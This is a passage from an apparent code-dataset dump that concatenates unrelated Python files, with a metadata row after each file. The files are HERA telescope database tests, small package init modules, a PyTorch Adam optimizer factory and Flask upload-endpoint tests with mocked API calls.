        result = mcsession._get_node_snap_from_serial('foo')
    assert result == (None, None)
def test_get_node_snap_from_serial_multiple_revs(mcsession):
    """Test multiple snap location numbers."""
    # add a second revision ('B') of an existing snap part
    part = cm_partconnect.Parts()
    part.hpn = 'SNPD000703'
    part.hpn_rev = 'B'
    part.hptype = 'snap'
    part.manufacture_number = 'D000703'
    part.start_gpstime = 1230375618
    mcsession.add(part)
    mcsession.commit()

    # connect the new revision to a node location
    connection = cm_partconnect.Connections()
    connection.upstream_part = 'SNPD000703'
    connection.up_part_rev = 'B'
    connection.downstream_part = 'N701'
    connection.down_part_rev = 'A'
    connection.upstream_output_port = 'rack'
    connection.downstream_input_port = 'loc2'
    connection.start_gpstime = 1230375618
    mcsession.add(connection)
    mcsession.commit()

    # with two active revisions the lookup is ambiguous:
    # it warns and returns (None, None)
    with pytest.warns(
        UserWarning,
        match="There is more that one active revision for snap serial SNPD000703. "
        "Setting node and snap location numbers to None"
    ):
        node, snap_loc_num = mcsession._get_node_snap_from_serial('SNPD000703')
    assert node is None
    assert snap_loc_num is None
def test_get_node_snap_from_serial_multiple_times_diffloc(mcsession):
    """Test multiple times with change in location."""
    # stop earlier connection
    conn_to_stop = [['SNPD000703', 'A', 'N701', 'A', 'rack', 'loc3',
                     1230375618]]
    cm_partconnect.stop_connections(mcsession, conn_to_stop,
                                    Time(1230375700, format='gps'))

    # add a later connection at a different location ('loc2')
    connection = cm_partconnect.Connections()
    connection.upstream_part = 'SNPD000703'
    connection.up_part_rev = 'A'
    connection.downstream_part = 'N701'
    connection.down_part_rev = 'A'
    connection.upstream_output_port = 'rack'
    connection.downstream_input_port = 'loc2'
    connection.start_gpstime = 1230375718
    mcsession.add(connection)
    mcsession.commit()

    # only one connection is still active, so no warning is raised and
    # the new location (loc2 -> snap_loc_num 2) is returned
    node, snap_loc_num = checkWarnings(mcsession._get_node_snap_from_serial,
                                       ['SNPD000703'], nwarnings=0)
    assert node == 701
    assert snap_loc_num == 2
def test_get_snap_hostname_from_serial(mcsession, snapstatus):
    """Test mapping a SNAP serial number to its reported hostname."""
    test_session = mcsession
    test_session.add_snap_status_from_corrcm(
        snap_status_dict=snapstatus)
    hostname = test_session.get_snap_hostname_from_serial('SNPA000700')
    assert hostname == 'heraNode700Snap0'
    # asking for a hostname from before the part_rosetta was active should give None
    hostname = test_session.get_snap_hostname_from_serial(
        'SNPA000700', at_date=Time(1512770942, format='unix')
    )
    assert hostname is None
    # an unknown serial also gives None
    hostname = test_session.get_snap_hostname_from_serial('blah')
    assert hostname is None
@requires_redis
def test_site_add_snap_status_from_corrcm(mcsession):
    """Redis-backed smoke test: pull live SNAP status from the correlator."""
    test_session = mcsession
    # get the snap status dict from the correlator redis
    snap_status_dict = corr._get_snap_status()
    assert len(snap_status_dict) >= 1
    # use the real (not test) database to get the node & snap location number
    real_db = mc.connect_to_mc_db(None)
    real_session = real_db.sessionmaker()
    test_session.add_snap_status_from_corrcm(cm_session=real_session)
    result = test_session.get_snap_status(most_recent=True)
    assert len(result) >= 1
def test_add_antenna_status(mcsession):
    """Test adding and retrieving antenna status records.

    Adds two statuses (different antennas, different times) and checks
    retrieval by time window, by antenna number and via most-recent
    queries. List-valued inputs are stored as bracketed strings.
    """
    test_session = mcsession
    t1 = Time('2016-01-10 01:15:23', scale='utc')
    t2 = t1 + TimeDelta(120.0, format='sec')

    eq_coeffs = (np.zeros((5)) + 56.921875).tolist()
    histogram_bins = [-4, -3, -2, -1, 0, 1, 2, 3]
    histogram = [0, 3, 6, 10, 12, 8, 4, 0]
    # pam/fem ids are stored as the concatenated hex of the byte list
    pam_id_list = [112, 217, 32, 59, 1, 0, 0, 14]
    pam_id = ''.join([hex(i)[2:] for i in pam_id_list])
    fem_id_list = [0, 168, 19, 212, 51, 51, 255, 255]
    fem_id = ''.join([hex(i)[2:] for i in fem_id_list])
    test_session.add_antenna_status(t1, 4, 'e', 'heraNode700Snap0', 3,
                                    -0.5308380126953125, 3.0134560488579285,
                                    9.080917358398438, 0, -13.349140985640002,
                                    10.248, 0.6541, pam_id, 6.496,
                                    0.5627000000000001, fem_id,
                                    'antenna', True,
                                    1.3621702512711602, 30.762719534238915,
                                    26.327341308593752, False, eq_coeffs,
                                    histogram_bins, histogram)
    # lists round-trip as compact bracketed strings
    eq_coeffs_string = '[56.921875,56.921875,56.921875,56.921875,56.921875]'
    histogram_bin_string = '[-4,-3,-2,-1,0,1,2,3]'
    histogram_string = '[0,3,6,10,12,8,4,0]'
    expected = corr.AntennaStatus(time=int(floor(t1.gps)), antenna_number=4,
                                  antenna_feed_pol='e',
                                  snap_hostname='heraNode700Snap0',
                                  snap_channel_number=3,
                                  adc_mean=-0.5308380126953125,
                                  adc_rms=3.0134560488579285,
                                  adc_power=9.080917358398438, pam_atten=0,
                                  pam_power=-13.349140985640002,
                                  pam_voltage=10.248,
                                  pam_current=0.6541,
                                  pam_id=pam_id,
                                  fem_voltage=6.496,
                                  fem_current=0.5627000000000001,
                                  fem_id=fem_id,
                                  fem_switch='antenna',
                                  fem_lna_power=True,
                                  fem_imu_theta=1.3621702512711602,
                                  fem_imu_phi=30.762719534238915,
                                  fem_temp=26.327341308593752,
                                  fft_overflow=False,
                                  eq_coeffs=eq_coeffs_string,
                                  histogram_bin_centers=histogram_bin_string,
                                  histogram=histogram_string)
    result = test_session.get_antenna_status(
        starttime=t1 - TimeDelta(3.0, format='sec'))
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)

    # second status at a later time, different antenna, with None fem values
    eq_coeffs = (np.zeros((5)) + 73.46875).tolist()
    histogram_bins = [-4, -3, -2, -1, 0, 1, 2, 3]
    histogram = [0, 3, 6, 10, 12, 8, 4, 0]
    pam_id_list = [112, 84, 143, 59, 1, 0, 0, 242]
    pam_id = ''.join([hex(i)[2:] for i in pam_id_list])
    fem_id_list = [0, 168, 19, 212, 51, 51, 255, 255]
    fem_id = ''.join([hex(i)[2:] for i in fem_id_list])
    test_session.add_antenna_status(t2, 31, 'n', 'heraNode4Snap3', 7,
                                    -0.4805450439453125, 16.495319974304454,
                                    272.0955810546875, 0, -32.03119784856,
                                    10.268, 0.6695000000000001, pam_id,
                                    None, None, fem_id,
                                    'noise', False,
                                    1.3621702512711602, 30.762719534238915,
                                    27.828854980468755, True, eq_coeffs,
                                    histogram_bins, histogram)
    result = test_session.get_antenna_status(
        starttime=t1 - TimeDelta(3.0, format='sec'), antenna_number=4)
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)

    result_most_recent = test_session.get_antenna_status(antenna_number=4)
    assert len(result_most_recent) == 1
    result_most_recent = result_most_recent[0]
    assert result_most_recent.isclose(expected)

    eq_coeffs_string = '[73.46875,73.46875,73.46875,73.46875,73.46875]'
    histogram_bin_string = '[-4,-3,-2,-1,0,1,2,3]'
    histogram_string = '[0,3,6,10,12,8,4,0]'
    expected = corr.AntennaStatus(time=int(floor(t2.gps)), antenna_number=31,
                                  antenna_feed_pol='n',
                                  snap_hostname='heraNode4Snap3',
                                  snap_channel_number=7,
                                  adc_mean=-0.4805450439453125,
                                  adc_rms=16.495319974304454,
                                  adc_power=272.0955810546875, pam_atten=0,
                                  pam_power=-32.03119784856,
                                  pam_voltage=10.268,
                                  pam_current=0.6695000000000001,
                                  pam_id=pam_id,
                                  fem_voltage=None,
                                  fem_current=None,
                                  fem_id=fem_id,
                                  fem_switch='noise',
                                  fem_lna_power=False,
                                  fem_imu_theta=1.3621702512711602,
                                  fem_imu_phi=30.762719534238915,
                                  fem_temp=27.828854980468755,
                                  fft_overflow=True,
                                  eq_coeffs=eq_coeffs_string,
                                  histogram_bin_centers=histogram_bin_string,
                                  histogram=histogram_string)
    result = test_session.get_antenna_status(
        starttime=t1 - TimeDelta(3.0, format='sec'), antenna_number=31)
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)

    result_most_recent = test_session.get_antenna_status(antenna_number=31)
    assert len(result_most_recent) == 1
    result_most_recent = result_most_recent[0]
    assert result_most_recent.isclose(expected)

    # window ending at t1 only contains the first status
    result = test_session.get_antenna_status(
        starttime=t1 - TimeDelta(3.0, format='sec'), stoptime=t1)
    assert len(result) == 1

    result_most_recent = test_session.get_antenna_status()
    # BUGFIX: previously asserted on `result` (already checked just above),
    # so the no-argument most-recent query was never actually verified.
    # Only the t2 status is most recent, so one row is expected.
    assert len(result_most_recent) == 1

    # a start time after all records returns an empty list
    result = test_session.get_antenna_status(
        starttime=t1 + TimeDelta(200.0, format='sec'))
    assert result == []
def test_add_antenna_status_from_corrcm(mcsession, antstatus):
    """Antenna-status records built from a correlator dict round-trip via the M&C db.

    Converts the ``antstatus`` fixture dict into AntennaStatus objects
    (``testing=True`` returns them instead of committing), adds them to the
    session, and checks that queries by antenna number return records matching
    the fixture's values for antennas 4 and 31.
    """
    test_session = mcsession
    # testing=True: build the objects but let this test add them explicitly.
    ant_status_obj_list = test_session.add_antenna_status_from_corrcm(
        ant_status_dict=antstatus, testing=True)
    for obj in ant_status_obj_list:
        test_session.add(obj)
    # Timestamp baked into the antstatus fixture.
    t1 = Time(datetime.datetime(2016, 1, 5, 20, 44, 52, 741137),
              format='datetime')
    result = test_session.get_antenna_status(
        starttime=t1 - TimeDelta(3.0, format='sec'), antenna_number=4)
    # The list-valued fields are stored as bracketed comma-joined strings;
    # rebuild the expected strings from the same arrays the fixture used.
    eq_coeffs_str = [str(val) for val
                     in (np.zeros((1024)) + 56.921875).tolist()]
    eq_coeffs_string = '[' + ','.join(eq_coeffs_str) + ']'
    # NOTE(review): 310 bin centers vs 256 histogram counts below — mirrors
    # the fixture data; confirm the mismatch is intentional.
    histogram_bin_str = [str(val) for val
                         in np.arange(-128, 182, dtype=np.int_).tolist()]
    histogram_bin_string = '[' + ','.join(histogram_bin_str) + ']'
    histogram_str = [str(val) for val in (np.zeros((256)) + 10).tolist()]
    histogram_string = '[' + ','.join(histogram_str) + ']'
    # PAM/FEM serial numbers are hex-encoded byte lists with no separators.
    pam_id_list = [112, 217, 32, 59, 1, 0, 0, 14]
    pam_id = ''.join([hex(i)[2:] for i in pam_id_list])
    fem_id_list = [0, 168, 19, 212, 51, 51, 255, 255]
    fem_id = ''.join([hex(i)[2:] for i in fem_id_list])
    expected = corr.AntennaStatus(time=int(floor(t1.gps)), antenna_number=4,
                                  antenna_feed_pol='e',
                                  snap_hostname='heraNode700Snap0',
                                  snap_channel_number=3,
                                  adc_mean=-0.5308380126953125,
                                  adc_rms=3.0134560488579285,
                                  adc_power=9.080917358398438,
                                  pam_atten=0,
                                  pam_power=-13.349140985640002,
                                  pam_voltage=10.248,
                                  pam_current=0.6541,
                                  pam_id=pam_id,
                                  fem_voltage=6.496,
                                  fem_current=0.5627000000000001,
                                  fem_id=fem_id,
                                  fem_switch='antenna',
                                  fem_lna_power=True,
                                  fem_imu_theta=1.3621702512711602,
                                  fem_imu_phi=30.762719534238915,
                                  fem_temp=26.327341308593752,
                                  fft_overflow=False,
                                  eq_coeffs=eq_coeffs_string,
                                  histogram_bin_centers=histogram_bin_string,
                                  histogram=histogram_string)
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)
    # Querying without a starttime returns the most recent record.
    result_most_recent = test_session.get_antenna_status(antenna_number=4)
    assert len(result_most_recent) == 1
    result_most_recent = result_most_recent[0]
    assert result_most_recent.isclose(expected)
    # Second antenna (31) with its own expected field values.
    result = test_session.get_antenna_status(
        starttime=t1 - TimeDelta(3.0, format='sec'), antenna_number=31)
    eq_coeffs_str = [str(val) for val in
                     (np.zeros((1024)) + 73.46875).tolist()]
    eq_coeffs_string = '[' + ','.join(eq_coeffs_str) + ']'
    histogram_bin_str = [str(val) for val
                         in np.arange(-128, 182, dtype=np.int_).tolist()]
    histogram_bin_string = '[' + ','.join(histogram_bin_str) + ']'
    histogram_str = [str(val) for val in (np.zeros((256)) + 12).tolist()]
    histogram_string = '[' + ','.join(histogram_str) + ']'
    pam_id_list = [112, 84, 143, 59, 1, 0, 0, 242]
    pam_id = ''.join([hex(i)[2:] for i in pam_id_list])
    fem_id_list = [0, 168, 19, 212, 51, 51, 255, 255]
    fem_id = ''.join([hex(i)[2:] for i in fem_id_list])
    expected = corr.AntennaStatus(time=int(floor(t1.gps)), antenna_number=31,
                                  antenna_feed_pol='n',
                                  snap_hostname='heraNode4Snap3',
                                  snap_channel_number=7,
                                  adc_mean=-0.4805450439453125,
                                  adc_rms=16.495319974304454,
                                  adc_power=272.0955810546875, pam_atten=0,
                                  pam_power=-32.03119784856,
                                  pam_voltage=10.268,
                                  pam_current=0.6695000000000001,
                                  pam_id=pam_id,
                                  fem_voltage=None,
                                  fem_current=None,
                                  fem_id=fem_id,
                                  fem_switch='noise',
                                  fem_lna_power=False,
                                  fem_imu_theta=1.3621702512711602,
                                  fem_imu_phi=30.762719534238915,
                                  fem_temp=27.828854980468755,
                                  fft_overflow=True,
                                  eq_coeffs=eq_coeffs_string,
                                  histogram_bin_centers=histogram_bin_string,
                                  histogram=histogram_string)
    assert len(result) == 1
    result = result[0]
    assert result.isclose(expected)
    # Without an antenna_number filter, both antennas' records come back.
    result_most_recent = test_session.get_antenna_status()
    assert len(result_most_recent) == 2
def test_add_antenna_status_from_corrcm_with_nones(mcsession, antstatus_none):
    """A correlator dict full of None values still produces valid records.

    The ``antstatus_none`` fixture has an unknown fem_switch mode (which
    should warn) and None for every optional field; both antennas' records
    should still be stored and match an all-None expected status.
    """
    session = mcsession
    # The unrecognized fem_switch mode in the fixture must trigger a warning.
    checkWarnings(session.add_antenna_status_from_corrcm,
                  func_kwargs={'ant_status_dict': antstatus_none},
                  message='fem_switch value is Unknown mode')
    status_time = Time(datetime.datetime(2016, 1, 5, 20, 44, 52, 741137),
                       format='datetime')
    results = session.get_antenna_status(
        starttime=status_time - TimeDelta(3.0, format='sec'))
    assert len(results) == 2
    # Every optional column should have come through as None.
    none_fields = dict(
        snap_hostname=None, snap_channel_number=None, adc_mean=None,
        adc_rms=None, adc_power=None, pam_atten=None, pam_power=None,
        pam_voltage=None, pam_current=None, pam_id=None, fem_voltage=None,
        fem_current=None, fem_id=None, fem_switch=None, fem_lna_power=None,
        fem_imu_theta=None, fem_imu_phi=None, fem_temp=None,
        fft_overflow=None, eq_coeffs=None, histogram_bin_centers=None,
        histogram=None)
    for ant_number, feed_pol in [(4, 'e'), (31, 'n')]:
        expected = corr.AntennaStatus(
            time=int(floor(status_time.gps)), antenna_number=ant_number,
            antenna_feed_pol=feed_pol, **none_fields)
        status = session.get_antenna_status(antenna_number=ant_number)[0]
        assert status.isclose(expected)
def test_antenna_status_errors(mcsession):
    """add_antenna_status rejects bad time, fem_switch and feed-pol values."""
    session = mcsession
    obs_time = Time('2016-01-10 01:15:23', scale='utc')
    eq_coeffs = (np.zeros((5)) + 56.921875).tolist()
    histogram_bins = [-4, -3, -2, -1, 0, 1, 2, 3]
    histogram = [0, 3, 6, 10, 12, 8, 4, 0]
    # Hex-encoded module serial numbers.
    pam_id = ''.join(hex(i)[2:] for i in [112, 217, 32, 59, 1, 0, 0, 14])
    fem_id = ''.join(hex(i)[2:] for i in [0, 168, 19, 212, 51, 51, 255, 255])

    def status_args(time=obs_time, feed_pol='e', fem_switch='antenna'):
        # Full positional argument tuple for add_antenna_status, with the
        # field under test substituted in.
        return (time, 4, feed_pol, 'heraNode700Snap0', 3,
                -0.5308380126953125, 3.0134560488579285, 9.080917358398438,
                0, -13.349140985640002, 10.248, 0.6541, pam_id,
                6.496, 0.5627000000000001, fem_id, fem_switch, True,
                1.3621702512711602, 30.762719534238915, 26.327341308593752,
                False, eq_coeffs, histogram_bins, histogram)

    # time must be an astropy Time object, not a string.
    pytest.raises(ValueError, session.add_antenna_status,
                  *status_args(time='foo'))
    # fem_switch must be a recognized mode.
    pytest.raises(ValueError, session.add_antenna_status,
                  *status_args(fem_switch='foo'))
    # antenna_feed_pol must be a valid polarization.
    pytest.raises(ValueError, session.add_antenna_status,
                  *status_args(feed_pol='x', fem_switch='load'))
@requires_redis
def test_site_add_antenna_status_from_corrcm(mcsession):
    """Integration test: pull antenna status from the live correlator redis.

    Skipped unless a redis server is reachable (``requires_redis``). Only
    checks that at least one status record lands in the database, since the
    live data's contents are not predictable.
    """
    test_session = mcsession
    test_session.add_antenna_status_from_corrcm()
    result = test_session.get_antenna_status(most_recent=True)
    assert len(result) >= 1
| 41.181412 | 94 | 0.628651 | 10,961 | 92,164 | 4.985312 | 0.055196 | 0.056365 | 0.02972 | 0.03294 | 0.835096 | 0.796409 | 0.769783 | 0.740777 | 0.711222 | 0.684375 | 0 | 0.072915 | 0.265939 | 92,164 | 2,237 | 95 | 41.199821 | 0.734783 | 0.032735 | 0 | 0.658784 | 0 | 0.001126 | 0.090843 | 0.006758 | 0.003378 | 0 | 0 | 0 | 0.153153 | 1 | 0.033221 | false | 0 | 0.007883 | 0.005068 | 0.047297 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
48b4192d3fda98f984cbda6938341dd00524be9b | 448 | py | Python | ide/utils/sdk/__init__.py | Ramonrlb/cloudpebble | 20b5408724aa810ce1626552d9f1062f1094fc3b | [
"MIT"
] | 147 | 2015-01-11T04:33:10.000Z | 2021-08-12T18:22:52.000Z | ide/utils/sdk/__init__.py | Ramonrlb/cloudpebble | 20b5408724aa810ce1626552d9f1062f1094fc3b | [
"MIT"
] | 155 | 2015-01-02T12:54:30.000Z | 2020-11-06T19:17:09.000Z | ide/utils/sdk/__init__.py | gfunkmonk/cloudpebble-1 | c5b63483ac26ae0d60ac7ef1bf9e803400188e91 | [
"MIT"
] | 105 | 2015-01-01T21:04:36.000Z | 2021-01-22T22:10:38.000Z | from manifest import generate_manifest, generate_manifest_dict, load_manifest_dict, dict_to_pretty_json, manifest_name_for_project
from sdk_scripts import generate_wscript_file, generate_jshint_file
from project_assembly import assemble_project
__all__ = ['generate_manifest', 'generate_manifest_dict', 'load_manifest_dict', 'dict_to_pretty_json', 'manifest_name_for_project', 'generate_wscript_file', 'generate_jshint_file', 'assemble_project']
| 64 | 200 | 0.866071 | 60 | 448 | 5.833333 | 0.333333 | 0.182857 | 0.137143 | 0.182857 | 0.725714 | 0.725714 | 0.514286 | 0.514286 | 0.514286 | 0.514286 | 0 | 0 | 0.064732 | 448 | 6 | 201 | 74.666667 | 0.835322 | 0 | 0 | 0 | 1 | 0 | 0.352679 | 0.151786 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d2daf5cf62cccbdde48c66c1c3fde01a8694e5a8 | 127 | py | Python | src/factories/optimizer_factory.py | gmum/cwae-pytorch | 7fb31a5d12a0a637be7dde76f0e11e80ec4a345d | [
"MIT"
] | 4 | 2020-08-20T20:51:24.000Z | 2022-01-26T23:56:35.000Z | src/factories/optimizer_factory.py | gmum/cwae-pytorch | 7fb31a5d12a0a637be7dde76f0e11e80ec4a345d | [
"MIT"
] | null | null | null | src/factories/optimizer_factory.py | gmum/cwae-pytorch | 7fb31a5d12a0a637be7dde76f0e11e80ec4a345d | [
"MIT"
] | 1 | 2021-12-24T14:13:40.000Z | 2021-12-24T14:13:40.000Z | from torch.optim import Adam
def get_optimizer_factory(parameters, lr: float):
    """Build an Adam optimizer for the given model parameters.

    Args:
        parameters: Iterable of parameters to optimize, or an iterable of
            parameter-group dicts, as accepted by ``torch.optim.Adam``.
            (Previously annotated ``dict``, which was misleading — Adam
            takes an iterable, e.g. ``model.parameters()``.)
        lr: Learning rate.

    Returns:
        A configured ``torch.optim.Adam`` instance.
    """
    return Adam(parameters, lr=lr)
| 21.166667 | 56 | 0.732283 | 18 | 127 | 5.055556 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181102 | 127 | 5 | 57 | 25.4 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
826f8d10a222e567516cd9a14884b4a15ebe6980 | 105 | py | Python | carapace/__init__.py | mikemalinowski/carapace | e6e0e8378ca009dba7880de6401eed6ab8b6d106 | [
"MIT"
] | null | null | null | carapace/__init__.py | mikemalinowski/carapace | e6e0e8378ca009dba7880de6401eed6ab8b6d106 | [
"MIT"
] | 6 | 2020-06-29T02:49:52.000Z | 2020-06-29T03:09:03.000Z | carapace/__init__.py | mikemalinowski/carapace | e6e0e8378ca009dba7880de6401eed6ab8b6d106 | [
"MIT"
] | null | null | null | from .core import Tool
from .core import toolkit
from . import ui
from .ui.widgets.toolbar import launch | 21 | 38 | 0.790476 | 17 | 105 | 4.882353 | 0.529412 | 0.192771 | 0.337349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152381 | 105 | 5 | 38 | 21 | 0.932584 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8296a856e62d940f1311d8d18771a8bb95680916 | 13,023 | py | Python | tests/application/controllers/test_upload.py | alphagov-mirror/performanceplatform-admin | b63ae42b1276699623ef208b7d6edd3e0ce4ca59 | [
"MIT"
] | 1 | 2017-05-14T21:31:33.000Z | 2017-05-14T21:31:33.000Z | tests/application/controllers/test_upload.py | alphagov-mirror/performanceplatform-admin | b63ae42b1276699623ef208b7d6edd3e0ce4ca59 | [
"MIT"
] | 33 | 2015-01-05T12:23:45.000Z | 2021-03-24T10:59:47.000Z | tests/application/controllers/test_upload.py | alphagov-mirror/performanceplatform-admin | b63ae42b1276699623ef208b7d6edd3e0ce4ca59 | [
"MIT"
] | 4 | 2017-03-16T15:52:33.000Z | 2021-04-10T20:14:53.000Z | from hamcrest import (
assert_that, equal_to, ends_with,
contains_string, has_entries
)
from mock import patch, Mock
from StringIO import StringIO
from tests.application.support.flask_app_test_case import (
FlaskAppTestCase, signed_in)
import requests
class UploadTestCase(FlaskAppTestCase):
    """Tests for the /upload-data endpoints.

    All network dependencies (Stagecraft's AdminAPI, Backdrop's DataSet,
    virus scanning) are patched out with mocks. Stacked ``@patch``
    decorators inject mocks bottom-up, so the decorator closest to the
    ``def`` becomes the first mock argument. The trailing ``client``
    argument is a test client — presumably supplied by the ``signed_in``
    decorator (TODO confirm against flask_app_test_case).
    """

    def setUp(self):
        # Disable CSRF so tests can POST forms without fetching a token.
        self.app.config['WTF_CSRF_ENABLED'] = False

    @signed_in()
    @patch('performanceplatform.client.admin.AdminAPI.get_data_set')
    @patch('application.files.uploaded.UploadedFile.is_virus')
    @patch('performanceplatform.client.data_set.DataSet.post')
    def test_user_can_post_to_upload_data(
            self,
            data_set_post_patch,
            is_virus_patch,
            get_data_set_patch,
            client):
        """Happy path: an uploaded CSV is parsed and POSTed to Backdrop."""
        is_virus_patch.return_value = False
        get_data_set_patch.return_value = {
            'data_group': 'carers-allowance',
            'data_type': 'volumetrics',
            'bearer_token': 'abc123', 'foo': 'bar'
        }
        post_data = {
            'file':
                (StringIO('_timestamp,foo\n2014-08-05T00:00:00Z,40'),
                 'MYSPECIALFILE.csv')
        }
        response = client.post(
            '/upload-data/carers-allowance/volumetrics',
            data=post_data)
        # The CSV row should arrive at Backdrop as one typed JSON record.
        expected_post = [{u'_timestamp': u'2014-08-05T00:00:00Z', u'foo': 40}]
        data_set_post_patch.assert_called_once_with(expected_post)
        upload_done_path = '/upload-data'
        assert_that(response.headers['Location'], ends_with(upload_done_path))
        assert_that(response.status_code, equal_to(302))
        # The session records which data set was just uploaded.
        assert_that(
            self.get_from_session('upload_data'),
            has_entries({
                u'data_type': u'volumetrics',
                u'data_group': u'carers-allowance'
            }))

    @signed_in()
    @patch('performanceplatform.client.admin.AdminAPI.get_data_set')
    def test_no_data_set_config_returns_error(
            self,
            get_data_set_patch,
            client):
        """Uploading to an unknown data set yields a 404 with a message."""
        get_data_set_patch.return_value = None
        response = client.post(
            '/upload-data/carers-allowance/volumetrics',
            data={'file': (StringIO('data'), 'file.xlsx')})
        assert_that(response.data, contains_string(
            'There is no data set of for data-group'))
        assert_that(response.status_code, equal_to(404))

    @signed_in()
    @patch('performanceplatform.client.admin.AdminAPI.get_data_set')
    def test_http_error_from_stagecraft_flashes_message(
            self,
            get_data_set_patch,
            client):
        """An HTTP error from Stagecraft is flashed and redirects back."""
        get_data_set_patch.side_effect = backdrop_response(403, {})
        response = client.post(
            '/upload-data/carers-allowance/volumetrics',
            data={'file': (StringIO('data'), 'file.xlsx')})
        # The error string is stashed in the session payload for display.
        assert_that(
            self.get_from_session('upload_data')['payload'],
            equal_to(['[403] {}']))
        assert_that(response.headers['Location'], ends_with('/upload-data'))
        assert_that(response.status_code, equal_to(302))

    @signed_in()
    @patch('performanceplatform.client.admin.AdminAPI.get_data_set')
    @patch('application.files.uploaded.UploadedFile.is_virus')
    @patch('performanceplatform.client.data_set.DataSet.post')
    def test_http_error_from_backdrop_flashes_message(
            self,
            data_set_post_patch,
            is_virus_patch,
            get_data_set_patch,
            client):
        """An HTTP error from Backdrop is flashed and redirects back."""
        is_virus_patch.return_value = False
        get_data_set_patch.return_value = {
            'data_group': 'carers-allowance',
            'data_type': 'volumetrics',
            'bearer_token': 'abc123', 'foo': 'bar'
        }
        data_set_post_patch.side_effect = backdrop_response(401, {})
        post_data = {
            'file':
                (StringIO('_timestamp,foo\n2014-08-05T00:00:00Z,40'),
                 'MYSPECIALFILE.csv')
        }
        response = client.post(
            '/upload-data/carers-allowance/volumetrics',
            data=post_data)
        assert_that(
            self.get_from_session('upload_data')['payload'],
            equal_to(['[401] {}']))
        assert_that(response.headers['Location'], ends_with('/upload-data'))
        assert_that(response.status_code, equal_to(302))

    @signed_in()
    @patch('performanceplatform.client.admin.AdminAPI.get_data_set')
    @patch('application.files.uploaded.UploadedFile.is_virus')
    @patch('performanceplatform.client.data_set.DataSet.post')
    def test_unauthorized_from_backdrop_json(
            self,
            data_set_post_patch,
            is_virus_patch,
            get_data_set_patch,
            client):
        """With a JSON Accept header, a Backdrop 401 surfaces as a 500."""
        is_virus_patch.return_value = False
        get_data_set_patch.return_value = {
            'data_group': 'carers-allowance',
            'data_type': 'volumetrics',
            'bearer_token': 'abc123', 'foo': 'bar'
        }
        data_set_post_patch.side_effect = backdrop_response(401, {})
        post_data = {
            'file':
                (StringIO('_timestamp,foo\n2014-08-05T00:00:00Z,40'),
                 'MYSPECIALFILE.csv')
        }
        response = client.post(
            '/upload-data/carers-allowance/volumetrics',
            data=post_data,
            headers={'Accept': 'application/json'},
        )
        assert_that(response.status_code, equal_to(500))

    @signed_in()
    @patch('performanceplatform.client.admin.AdminAPI.get_data_set')
    @patch('application.files.uploaded.UploadedFile.is_virus')
    @patch('performanceplatform.client.data_set.DataSet.post')
    def test_http_error_from_backdrop_json(
            self,
            data_set_post_patch,
            is_virus_patch,
            get_data_set_patch,
            client):
        """With a JSON Accept header, a Backdrop 400 is passed through."""
        is_virus_patch.return_value = False
        get_data_set_patch.return_value = {
            'data_group': 'carers-allowance',
            'data_type': 'volumetrics',
            'bearer_token': 'abc123', 'foo': 'bar'
        }
        data_set_post_patch.side_effect = backdrop_response(400, {})
        post_data = {
            'file':
                (StringIO('_timestamp,foo\n2014-08-05T00:00:00Z,40'),
                 'MYSPECIALFILE.csv')
        }
        response = client.post(
            '/upload-data/carers-allowance/volumetrics',
            data=post_data,
            headers={'Accept': 'application/json'},
        )
        assert_that(response.status_code, equal_to(400))

    @signed_in()
    @patch('performanceplatform.client.admin.AdminAPI.get_data_set')
    @patch('application.files.uploaded.UploadedFile.is_virus')
    @patch('performanceplatform.client.data_set.DataSet.post')
    def test_validation_error_from_backdrop_json(
            self,
            data_set_post_patch,
            is_virus_patch,
            get_data_set_patch,
            client):
        """Backdrop validation messages are relayed in the JSON payload."""
        is_virus_patch.return_value = False
        get_data_set_patch.return_value = {
            'data_group': 'carers-allowance',
            'data_type': 'volumetrics',
            'bearer_token': 'abc123', 'foo': 'bar'
        }
        data_set_post_patch.side_effect = backdrop_response(
            400,
            {
                "messages": ['message_1', 'message_2']
            }
        )
        post_data = {
            'file':
                (StringIO('_timestamp,foo\n2014-08-05T00:00:00Z,40'),
                 'MYSPECIALFILE.csv')
        }
        response = client.post(
            '/upload-data/carers-allowance/volumetrics',
            data=post_data,
            headers={'Accept': 'application/json'},
        )
        assert_that(
            response.json['payload'],
            equal_to(['message_1', 'message_2'])
        )
